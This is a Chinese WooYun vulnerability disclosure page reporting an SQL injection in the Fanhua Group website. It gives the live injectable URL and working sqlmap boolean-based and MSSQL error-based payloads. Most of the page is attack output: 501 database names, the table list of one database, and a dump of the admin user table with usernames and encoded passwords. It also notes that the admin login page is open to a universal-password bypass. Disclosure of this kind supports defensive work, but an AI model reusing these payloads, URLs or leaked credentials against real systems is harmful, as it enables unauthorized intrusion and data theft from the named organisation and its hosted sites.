乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-17: 厂商已经主动忽略漏洞,细节向公众公开
泛华集团主站存在SQL注入,涉及500多个库和站点
注入点:http://www.fanhua.net.cn/2xwdt_1jtxw_xx.aspx?nid=16774泛华集团是国家建设部原直属企业,是为探索城市建设和建筑业改革,并为实践城市建设、工程总承包和建设项目全过程管理而设立的现代化企业。
sqlmap identified the following injection point(s) with a total of 30 HTTP(s) requests:---Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=16774 AND 6727=6727 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: nid=16774 AND 2548=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2548=2548) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(113)))---web server operating system: Windowsweb application technology: ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current database: 'DB_31964'current user is DBA: Falseavailable databases [501]:[*] 111[*] allflex_com_cn[*] andly_com[*] andlypack_com[*] auroragroup_com_cn[*] baida_finance_com[*] banyano_com[*] baolong_biz[*] bestfeel_net[*] biadma_com[*] bjaptps_org[*] bkmasic_cn[*] blueprint_com_cn[*] bmwood_com[*] bonovo_baa_com[*] careri_com[*] ccmaz_com[*] ceia_org_cn[*] centerland_com_cn[*] Charles[*] china_ether_com[*] chinagoldrich_com[*] chinajl_com_cn[*] chinatitan_com[*] choicemmed_com[*] chontdo_com[*] cigia_org_cn[*] cimco_com_cn[*] cn_chinacib_com[*] coagi_com_cn[*] cocom_cn[*] cs_glux_com_cn[*] cuug_com[*] cwsforum_com[*] cycs_com_cn[*] cycshj_cn[*] cyfw_com_cn[*] DB_10445[*] DB_11190[*] DB_11191[*] DB_11227[*] DB_11789[*] DB_11832[*] DB_11892[*] DB_12209[*] DB_12720[*] DB_12729[*] DB_12766[*] DB_12906[*] DB_12907[*] DB_13053[*] DB_13392[*] DB_13901[*] DB_14294[*] DB_14295[*] DB_14320[*] DB_14586[*] DB_14755[*] DB_15144[*] DB_15159[*] DB_15529[*] DB_15549[*] DB_15582[*] DB_15786[*] DB_15787[*] DB_15852[*] DB_15964[*] DB_16393[*] DB_16432[*] DB_16809[*] DB_16942[*] DB_17020[*] DB_17071[*] DB_17659[*] DB_17680[*] DB_17848[*] DB_17851[*] DB_17859[*] DB_17903[*] DB_18104[*] DB_18105[*] DB_18131[*] DB_18181[*] DB_18632[*] DB_18828[*] DB_18884[*] DB_19385[*] DB_19386[*] DB_19391[*] DB_19454[*] DB_19455[*] DB_19456[*] DB_19461[*] DB_19530[*] DB_19547[*] DB_19655[*] DB_20094[*] DB_20225[*] DB_20267[*] DB_20278[*] DB_20283[*] DB_20291[*] DB_20322[*] DB_20339[*] DB_20354[*] DB_20395[*] DB_20540[*] DB_20675[*] DB_20725[*] DB_20727[*] DB_20788[*] DB_20838[*] DB_20946[*] DB_21140[*] DB_21237[*] DB_21244[*] DB_21690[*] DB_21935[*] DB_21936[*] DB_21962[*] DB_22173[*] DB_22227[*] DB_22275[*] DB_22395[*] DB_22396[*] DB_22421[*] DB_22457[*] DB_22476[*] DB_22477[*] DB_22491[*] DB_22594[*] DB_22636[*] DB_22655[*] DB_22676[*] DB_22677[*] DB_22678[*] DB_22746[*] DB_22750[*] DB_22766[*] DB_22886[*] DB_22939[*] DB_22948[*] DB_23086[*] DB_23088[*] DB_23089[*] DB_23186[*] DB_23242[*] DB_23296[*] DB_23530[*] DB_23706[*] DB_23731[*] DB_23757[*] DB_23780[*] DB_23802[*] DB_23805[*] DB_23927[*] DB_23985[*] DB_23994[*] DB_24018[*] DB_24020[*] DB_24057[*] DB_24058[*] DB_24122[*] DB_24241[*] DB_24243[*] DB_24293[*] DB_24318[*] DB_24363[*] DB_24424[*] DB_24425[*] DB_24476[*] DB_24493[*] DB_24518[*] DB_24553[*] DB_24554[*] DB_24555[*] DB_24556[*] DB_24557[*] DB_24558[*] DB_24559[*] DB_24560[*] DB_24564[*] DB_24568[*] DB_24569[*] DB_24612[*] DB_24613[*] DB_24615[*] DB_24618[*] DB_24638[*] DB_24690[*] DB_24721[*] DB_24736[*] DB_24741[*] DB_24832[*] DB_24838[*] DB_24875[*] DB_24933[*] DB_24958[*] DB_24975[*] DB_25033[*] DB_25114[*] DB_25119[*] DB_25125[*] DB_25127[*] DB_25155[*] DB_25164[*] DB_25183[*] DB_25360[*] DB_25367[*] DB_25372[*] DB_25373[*] DB_25554[*] DB_25605[*] DB_25640[*] DB_25641[*] DB_25651[*] DB_25655[*] DB_25657[*] DB_25808[*] DB_25812[*] DB_25818[*] DB_25821[*] DB_25828[*] DB_25830[*] DB_25904[*] DB_25954[*] DB_25957[*] DB_25958[*] DB_26010[*] DB_26055[*] DB_26084[*] DB_26117[*] DB_26238[*] DB_26285[*] DB_26297[*] DB_26306[*] DB_26371[*] DB_26478[*] DB_26495[*] DB_26498[*] DB_26520[*] DB_26544[*] DB_26549[*] DB_26554[*] DB_26617[*] DB_26619[*] DB_26650[*] DB_26651[*] DB_26672[*] DB_26695[*] DB_26698[*] DB_26928[*] DB_26929[*] DB_27016[*] DB_27153[*] DB_27200[*] DB_27228[*] DB_27229[*] DB_27376[*] DB_27417[*] DB_27419[*] DB_27450[*] DB_27493[*] DB_27598[*] DB_27741[*] DB_27782[*] DB_27934[*] DB_27935[*] DB_27972[*] DB_28021[*] DB_28025[*] DB_28029[*] DB_28217[*] DB_28283[*] DB_28354[*] DB_28396[*] DB_28402[*] DB_28415[*] DB_28683[*] DB_28737[*] DB_28748[*] DB_28801[*] DB_28829[*] DB_28859[*] DB_28860[*] DB_28897[*] DB_28934[*] DB_29038[*] DB_29039[*] DB_29090[*] DB_29091[*] DB_29124[*] DB_29134[*] DB_29140[*] DB_29170[*] DB_29172[*] DB_29173[*] DB_29174[*] DB_29176[*] DB_29177[*] DB_29178[*] DB_29249[*] DB_29253[*] DB_29260[*] DB_29567[*] DB_29607[*] DB_29681[*] DB_29774[*] DB_29804[*] DB_29841[*] DB_29889[*] DB_29898[*] DB_29913[*] DB_29917[*] DB_29974[*] DB_29976[*] DB_30087[*] DB_30425[*] DB_30461[*] DB_30462[*] DB_30471[*] DB_30552[*] DB_30568[*] DB_30573[*] DB_30587[*] DB_30595[*] DB_30597[*] DB_30613[*] DB_30629[*] DB_30713[*] DB_30714[*] DB_30715[*] DB_30727[*] DB_30972[*] DB_31125[*] DB_31133[*] DB_31144[*] DB_31145[*] DB_31172[*] DB_31205[*] DB_31209[*] DB_31218[*] DB_31224[*] DB_31265[*] DB_31280[*] DB_31298[*] DB_31299[*] DB_31382[*] DB_31403[*] DB_31454[*] DB_31479[*] DB_31480[*] DB_31482[*] DB_31484[*] DB_31489[*] DB_31507[*] DB_31531[*] DB_31548[*] DB_31563[*] DB_31609[*] DB_31721[*] DB_31743[*] DB_31744[*] DB_31790[*] DB_31839[*] DB_31877[*] DB_31907[*] DB_31936[*] DB_31938[*] DB_31964[*] DB_31970[*] DB_31973[*] DB_31987[*] DB_31993[*] DB_32067[*] DB_32092[*] DB_32167[*] DB_32226[*] DB_32253[*] DB_32264[*] DB_32266[*] DB_32377[*] DB_32580[*] DB_32709[*] DB_32732[*] DB_32739[*] DB_32746[*] DB_32824[*] DB_32834[*] DB_32902[*] DB_32932[*] DB_33161[*] DB_33179[*] DB_33190[*] DB_33217[*] DB_33223[*] DB_33224[*] DB_33299[*] DB_33333[*] DB_33401[*] DB_33402[*] DB_33404[*] DB_33405[*] DB_33417[*] DB_4198[*] DB_4199[*] DB_4200[*] DB_4201[*] DB_4249[*] DB_4255[*] DB_4278[*] DB_4317[*] DB_4331[*] DB_4353[*] DB_4367[*] DB_4626[*] DB_4717[*] DB_5517[*] DB_5562[*] DB_5566[*] DB_5567[*] DB_5887[*] DB_5888[*] DB_6170[*] DB_6171[*] DB_6293[*] DB_6541[*] DB_6542[*] DB_7048[*] DB_7068[*] DB_7070[*] DB_7625[*] DB_7854[*] DB_8091[*] DB_8203[*] DB_8204[*] DB_8213[*] DB_8219[*] DB_8244[*] DB_8481[*] DB_8603[*] DB_8695[*] DB_8699[*] DB_8724[*] DB_8731[*] DB_8735[*] DB_8888[*] DB_9417[*] DB_9457[*] dovercorporation_com[*] e_wanjie_com[*] en_ccmaz_com[*] en_chinacib_com[*] en_enhalor_com[*] enecal_com[*] enhalor_com[*] enlegendsilicon_com_[*] esan_com_cn[*] euroart_com_cn[*] evialis_com_cn[*] fullman_asset[*] hfkbio_com[*] hq_b_com[*] hualongpawn_com[*] invivo_nsa_com_cn[*] jingxijiaxiao_com_cn[*] jloil_com_cn[*] kingdomtravel_com_cn[*] lampearl_net[*] longsheng[*] luhuadui_com[*] lusunwyatt_com[*] master[*] mdc365_cn[*] model[*] msdb[*] navisystem_com_cn[*] nccnchina_org_cn[*] newstar_travel_com[*] rbgyfz_com_cn[*] sebiec_com[*] shiningad_com[*] sianjia_com[*] silversun_com_cn[*] sinopetroleum_com[*] snccity_com[*] supercomfort_cn[*] sureaa_com[*] sxhdzy_cn[*] tempdb[*] ticci_cn[*] um_hanyi_com_cn[*] xg_com_cn[*] xihuahotel_com[*] xingchuandesign_com[*] xinyaschool_com[*] yuancefund_com[*] zepasia_com[*] zippovip_com[*] zjql[*] zssteelpipe_com
当前数据库的表:
Database: DB_31964[60 tables]+-----------------------+| D99_CMD || D99_REG || D99_Tmp || DIY_TEMPCOMMAND_TABLE || S3_Tmp || cms_ad_class || cms_ad_file || cms_ad_mess || cms_admin_files || cms_admin_menu || cms_admin_role || cms_admin_user || cms_admin_userrole || cms_area_city || cms_area_news_column || cms_area_news_info || cms_area_province || cms_bq_info || cms_config || cms_files_images || cms_files_info || cms_files_kind || cms_friend_info || cms_gg_info || cms_hy_info || cms_hy_jf || cms_jytd_news_column || cms_jytd_news_info || cms_magazine_column || cms_magazine_info || cms_maps_info || cms_member_info || cms_member_kind || cms_member_level || cms_member_point || cms_menu_list || cms_message_center || cms_news_column || cms_news_comments || cms_news_info || cms_news_moban || cms_news_pic || cms_person_info || cms_position_info || cms_qixia_column || cms_qixia_info || cms_question_info || cms_related_news || cms_relates_our || cms_reply_info || cms_role_function || cms_shenqing_info || cms_smtp || cms_user_column || cms_ziliao || comdlist || dtproperties || jiaozhu || kill_kk || oldnews |+-----------------------+
管理员表:
Database: DB_31964Table: cms_admin_user[11 entries]+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+| UUID | column_uuid | IS_USE | USERNAME | is_child | END_TIME | PASSWORD | ADD_TIME | USER_TYPE | START_TIME |+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+| 6fc4a95308661 | + | 1 | liufan | + | + | 7L1qpW8a9sM= | + | + | + || admin | 0 | 1 | admin | 1 | 08+15+2006++4:28PM | 52ZW7p7z9eM= | + | %u7cfb%u7edf%u7528%u6237 | 08+15+2006++4:28PM || c0a891025143 | + | 1 | zxgl | + | + | zj/7svcAwGE= | + | + | + || c0a891047010 | + | 1 | cskf | + | + | zj/7svcAwGE= | + | + | + || c0a89106401 | + | 1 | jcss | + | + | V7NeHE+IO4s= | + | + | + || c0a891067359 | + | 1 | fhhw | + | + | zj/7svcAwGE= | + | + | + || c0a891070451 | + | 1 | fhjs | + | + | zj/7svcAwGE= | + | + | + || c0a891072027 | + | 1 | cyy | + | + | zj/7svcAwGE= | + | + | + || c0a89107679 | + | 1 | rlzy | + | + | zj/7svcAwGE= | + | + | + || c0a89107935 | + | 1 | kcsj | + | + | zj/7svcAwGE= | + | + | + || c0a891092319 | + | 1 | fhdc | + | + | zj/7svcAwGE= | + | + | + |+---------------+-------------+--------+----------+----------+--------------------+--------------+----------+--------------------------+--------------------+
后台管理页面也存在注入,万能密码即可登录http://www.fanhua.net.cn/manage/login.aspx
未能联系到厂商或者厂商积极拒绝
